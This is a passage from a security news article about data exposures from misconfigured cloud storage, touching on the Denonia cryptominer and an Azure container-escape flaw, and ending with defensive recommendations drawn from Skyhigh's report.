"Unfortunately, news headlines like these highlight examples of a data breach due to a simple, but harmful misconfiguration: an unsecured, exposed cloud storage service," according to Skyhigh's analysis. "Complexities around identity management, access permissions, secure configurations, data protection, and so much more, continuously result in poor cloud security hygiene and ultimately, data exposures."

And indeed, there has been no shortage of cloud security incidents recently — with misconfigurations leading the way. Cybercrime goals in subverting open databases can go beyond data pilfering, it should be noted, as shown by the recent discovery of Denonia, a Go-language-based cryptominer malware. It's designed to exploit AWS Lambda, the serverless function execution service.

Also, vulnerabilities in cloud products and services have become a growing concern for organizations, with a Linux container-escape flaw in Microsoft's Azure Service Fabric among the latest vulnerabilities disclosed.

The good news? One potential cloud security resource was recently established by security researchers at Wiz in the form of a community-based database — cloudvulndb.org — which currently lists some 70 cloud security issues and vulnerabilities.

**How to Protect Against Cloud Threats**

A recent survey of 500 security practitioners and 200 executives, conducted by cloud automation firm Lacework, indicated organizations must change the way they're securing cloud infrastructure and services.

Skyhigh’s report notes increasing read/write privileges are often the go-to for further strengthening cloud security. However, "in reality it will take far more than that; thanks to the extensive manners by which cloud storages can be accessed and misused," the report states.

So, other measures that the firm said should be implemented include: 

*   Enable automatic scanning for vulnerable storage across AWS S3 buckets and Azure Blobs.
*   Use continuous configuration audits for IaaS accounts and services to enforce consistent protection.
*   Enforce compliance checks against industry best practices to maintain secure postures.
*   Run data loss prevention and malware scans to detect violations in cloud-storage services and protect sensitive data from being exfiltrated.
*   Put measures in place to detect insider threats as well as threats from compromised accounts and privileged-access misuse.
*   And apply automatic remediation to take appropriate action against misconfigurations, vulnerabilities, and exposures.

Tag

#intel